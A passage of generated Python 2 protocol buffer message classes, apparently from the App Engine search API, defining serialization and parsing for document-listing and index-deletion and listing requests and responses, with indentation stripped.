tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_document().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.document_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("document%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kdocument = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "document",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListDocumentsResponse'
class DeleteIndexParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_index_spec()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteIndexParams'
class DeleteIndexRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = DeleteIndexParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 18:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
2: "app_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteIndexRequest'
class DeleteIndexResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteIndexResponse'
class CancelDeleteIndexParams(ProtocolBuffer.ProtocolMessage):
has_index_spec_ = 0
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
return n
def Clear(self):
self.clear_index_spec()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.CancelDeleteIndexParams'
class CancelDeleteIndexRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = CancelDeleteIndexParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 18:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
2: "app_id",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.CancelDeleteIndexRequest'
class CancelDeleteIndexResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.CancelDeleteIndexResponse'
class ListIndexesParams(ProtocolBuffer.ProtocolMessage):
has_fetch_schema_ = 0
fetch_schema_ = 0
has_limit_ = 0
limit_ = 20
has_namespace_ = 0
namespace_ = ""
has_start_index_name_ = 0
start_index_name_ = ""
has_include_start_index_ = 0
include_start_index_ = 1
has_index_name_prefix_ = 0
index_name_prefix_ = ""
has_offset_ = 0
offset_ = 0
has_source_ = 0
source_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def fetch_schema(self): return self.fetch_schema_
def set_fetch_schema(self, x):
self.has_fetch_schema_ = 1
self.fetch_schema_ = x
def clear_fetch_schema(self):
if self.has_fetch_schema_:
self.has_fetch_schema_ = 0
self.fetch_schema_ = 0
def has_fetch_schema(self): return self.has_fetch_schema_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 20
def has_limit(self): return self.has_limit_
def namespace(self): return self.namespace_
def set_namespace(self, x):
self.has_namespace_ = 1
self.namespace_ = x
def clear_namespace(self):
if self.has_namespace_:
self.has_namespace_ = 0
self.namespace_ = ""
def has_namespace(self): return self.has_namespace_
def start_index_name(self): return self.start_index_name_
def set_start_index_name(self, x):
self.has_start_index_name_ = 1
self.start_index_name_ = x
def clear_start_index_name(self):
if self.has_start_index_name_:
self.has_start_index_name_ = 0
self.start_index_name_ = ""
def has_start_index_name(self): return self.has_start_index_name_
def include_start_index(self): return self.include_start_index_
def set_include_start_index(self, x):
self.has_include_start_index_ = 1
self.include_start_index_ = x
def clear_include_start_index(self):
if self.has_include_start_index_:
self.has_include_start_index_ = 0
self.include_start_index_ = 1
def has_include_start_index(self): return self.has_include_start_index_
def index_name_prefix(self): return self.index_name_prefix_
def set_index_name_prefix(self, x):
self.has_index_name_prefix_ = 1
self.index_name_prefix_ = x
def clear_index_name_prefix(self):
if self.has_index_name_prefix_:
self.has_index_name_prefix_ = 0
self.index_name_prefix_ = ""
def has_index_name_prefix(self): return self.has_index_name_prefix_
def offset(self): return self.offset_
def set_offset(self, x):
self.has_offset_ = 1
self.offset_ = x
def clear_offset(self):
if self.has_offset_:
self.has_offset_ = 0
self.offset_ = 0
def has_offset(self): return self.has_offset_
def source(self): return self.source_
def set_source(self, x):
self.has_source_ = 1
self.source_ = x
def clear_source(self):
if self.has_source_:
self.has_source_ = 0
self.source_ = 0
def has_source(self): return self.has_source_
def MergeFrom(self, x):
assert x is not self
if (x.has_fetch_schema()): self.set_fetch_schema(x.fetch_schema())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_namespace()): self.set_namespace(x.namespace())
if (x.has_start_index_name()): self.set_start_index_name(x.start_index_name())
if (x.has_include_start_index()): self.set_include_start_index(x.include_start_index())
if (x.has_index_name_prefix()): self.set_index_name_prefix(x.index_name_prefix())
if (x.has_offset()): self.set_offset(x.offset())
if (x.has_source()): self.set_source(x.source())
def Equals(self, x):
if x is self: return 1
if self.has_fetch_schema_ != x.has_fetch_schema_: return 0
if self.has_fetch_schema_ and self.fetch_schema_ != x.fetch_schema_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_namespace_ != x.has_namespace_: return 0
if self.has_namespace_ and self.namespace_ != x.namespace_: return 0
if self.has_start_index_name_ != x.has_start_index_name_: return 0
if self.has_start_index_name_ and self.start_index_name_ != x.start_index_name_: return 0
if self.has_include_start_index_ != x.has_include_start_index_: return 0
if self.has_include_start_index_ and self.include_start_index_ != x.include_start_index_: return 0
if self.has_index_name_prefix_ != x.has_index_name_prefix_: return 0
if self.has_index_name_prefix_ and self.index_name_prefix_ != x.index_name_prefix_: return 0
if self.has_offset_ != x.has_offset_: return 0
if self.has_offset_ and self.offset_ != x.offset_: return 0
if self.has_source_ != x.has_source_: return 0
if self.has_source_ and self.source_ != x.source_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_fetch_schema_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_start_index_name_): n += 1 + self.lengthString(len(self.start_index_name_))
if (self.has_include_start_index_): n += 2
if (self.has_index_name_prefix_): n += 1 + self.lengthString(len(self.index_name_prefix_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
return n
def ByteSizePartial(self):
n = 0
if (self.has_fetch_schema_): n += 2
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_namespace_): n += 1 + self.lengthString(len(self.namespace_))
if (self.has_start_index_name_): n += 1 + self.lengthString(len(self.start_index_name_))
if (self.has_include_start_index_): n += 2
if (self.has_index_name_prefix_): n += 1 + self.lengthString(len(self.index_name_prefix_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
return n
def Clear(self):
self.clear_fetch_schema()
self.clear_limit()
self.clear_namespace()
self.clear_start_index_name()
self.clear_include_start_index()
self.clear_index_name_prefix()
self.clear_offset()
self.clear_source()
def OutputUnchecked(self, out):
if (self.has_fetch_schema_):
out.putVarInt32(8)
out.putBoolean(self.fetch_schema_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_start_index_name_):
out.putVarInt32(34)
out.putPrefixedString(self.start_index_name_)
if (self.has_include_start_index_):
out.putVarInt32(40)
out.putBoolean(self.include_start_index_)
if (self.has_index_name_prefix_):
out.putVarInt32(50)
out.putPrefixedString(self.index_name_prefix_)
if (self.has_offset_):
out.putVarInt32(56)
out.putVarInt32(self.offset_)
if (self.has_source_):
out.putVarInt32(64)
out.putVarInt32(self.source_)
def OutputPartial(self, out):
if (self.has_fetch_schema_):
out.putVarInt32(8)
out.putBoolean(self.fetch_schema_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_namespace_):
out.putVarInt32(26)
out.putPrefixedString(self.namespace_)
if (self.has_start_index_name_):
out.putVarInt32(34)
out.putPrefixedString(self.start_index_name_)
if (self.has_include_start_index_):
out.putVarInt32(40)
out.putBoolean(self.include_start_index_)
if (self.has_index_name_prefix_):
out.putVarInt32(50)
out.putPrefixedString(self.index_name_prefix_)
if (self.has_offset_):
out.putVarInt32(56)
out.putVarInt32(self.offset_)
if (self.has_source_):
out.putVarInt32(64)
out.putVarInt32(self.source_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_fetch_schema(d.getBoolean())
continue
if tt == 16:
self.set_limit(d.getVarInt32())
continue
if tt == 26:
self.set_namespace(d.getPrefixedString())
continue
if tt == 34:
self.set_start_index_name(d.getPrefixedString())
continue
if tt == 40:
self.set_include_start_index(d.getBoolean())
continue
if tt == 50:
self.set_index_name_prefix(d.getPrefixedString())
continue
if tt == 56:
self.set_offset(d.getVarInt32())
continue
if tt == 64:
self.set_source(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_fetch_schema_: res+=prefix+("fetch_schema: %s\n" % self.DebugFormatBool(self.fetch_schema_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_namespace_: res+=prefix+("namespace: %s\n" % self.DebugFormatString(self.namespace_))
if self.has_start_index_name_: res+=prefix+("start_index_name: %s\n" % self.DebugFormatString(self.start_index_name_))
if self.has_include_start_index_: res+=prefix+("include_start_index: %s\n" % self.DebugFormatBool(self.include_start_index_))
if self.has_index_name_prefix_: res+=prefix+("index_name_prefix: %s\n" % self.DebugFormatString(self.index_name_prefix_))
if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
if self.has_source_: res+=prefix+("source: %s\n" % self.DebugFormatInt32(self.source_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfetch_schema = 1
klimit = 2
knamespace = 3
kstart_index_name = 4
kinclude_start_index = 5
kindex_name_prefix = 6
koffset = 7
ksource = 8
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "fetch_schema",
2: "limit",
3: "namespace",
4: "start_index_name",
5: "include_start_index",
6: "index_name_prefix",
7: "offset",
8: "source",
}, 8)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.STRING,
7: ProtocolBuffer.Encoder.NUMERIC,
8: ProtocolBuffer.Encoder.NUMERIC,
}, 8, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListIndexesParams'
class ListIndexesRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = ListIndexesParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
